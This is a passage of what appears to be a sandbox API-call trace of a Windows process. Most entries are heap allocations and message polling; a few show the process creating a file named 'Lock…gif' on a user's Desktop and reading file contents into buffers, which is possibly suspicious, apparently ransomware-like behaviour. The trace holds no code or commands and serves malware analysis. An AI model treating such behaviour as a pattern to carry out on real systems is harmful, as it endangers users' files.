[0164.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e30 [0164.494] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0164.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0164.494] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0164.494] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0164.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0164.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0164.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0164.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0164.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0164.495] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/Lock.eGIW Yzvh.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\lock.egiw yzvh.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0164.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0164.496] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0164.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0164.496] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0164.496] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0164.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0164.496] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0164.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0164.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0164.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0164.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0164.496] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0164.496] ReadFile (in: hFile=0x1e8, lpBuffer=0x34b2250, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x34b2250*, lpNumberOfBytesRead=0x8bf500*=0xe924, lpOverlapped=0x0) returned 1 [0164.498] ReadFile (in: hFile=0x1e8, lpBuffer=0x34b2250, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x34b2250*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0164.499] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0164.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0164.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0164.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0164.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0164.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0164.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xe924) returned 0x24c7a50 [0164.499] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0164.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0164.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0164.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0164.500] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0164.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0164.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0164.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0164.500] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0164.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0164.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0164.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0164.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b16f8 [0164.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0164.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0164.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0164.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0164.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xe924) returned 0x24c7a50 [0164.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0164.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1c38 [0164.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0164.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0164.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0164.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2c18 [0164.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0164.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0164.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0164.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b16b8 [0164.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0164.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0164.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0164.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9570 [0164.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0164.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0164.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0164.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0164.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0164.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0164.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0164.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xe924) returned 0x24e4cb0 [0164.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0164.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0164.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0164.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0164.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0164.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0164.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0164.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0164.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0164.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0164.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0164.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0164.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0164.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0164.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0164.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0164.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0164.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0164.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0164.503] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 1 [0164.503] TranslateMessage (lpMsg=0x8bf3c0) returned 0 [0164.503] DispatchMessageW (lpMsg=0x8bf3c0) returned 0x0 [0164.503] KillTimer (hWnd=0x60122, uIDEvent=0x1) returned 1 [0164.503] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0164.503] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0164.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0164.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0164.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0164.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0164.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0164.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0164.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0164.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0164.503] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0164.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0164.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0164.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0164.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0164.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0164.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0164.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0164.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0164.504] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0164.504] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0164.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0164.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0164.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0164.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0164.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0164.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0164.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0164.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0164.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0164.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0164.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0164.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0164.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0164.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0164.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0164.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0164.505] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0164.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0164.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0164.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0164.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0164.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0164.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0164.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0164.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0164.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0164.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0164.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0164.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0164.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0164.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0164.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0164.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0164.506] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0164.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0164.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0164.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0164.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0164.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0164.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb10 [0164.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0164.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0164.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2412248 [0164.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0164.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0164.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0164.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0164.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0164.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0164.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0164.506] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0164.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0164.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0164.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0164.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0164.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0164.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0060 [0164.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0164.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0164.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0070 [0164.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0164.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0164.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0164.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0164.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0164.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0164.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0164.507] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0164.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0164.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0164.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0164.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0164.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0164.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0164.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0164.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0164.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0090 [0164.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0164.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0164.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0164.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0164.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0164.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0164.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0164.508] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0164.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0164.508] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0164.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0164.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0164.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9678 [0164.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0164.508] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0164.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0164.509] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0164.509] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0164.509] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0164.509] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0164.509] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0164.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0164.509] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00b0 [0164.509] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0164.509] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0164.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0164.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0164.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0164.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0164.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0164.509] 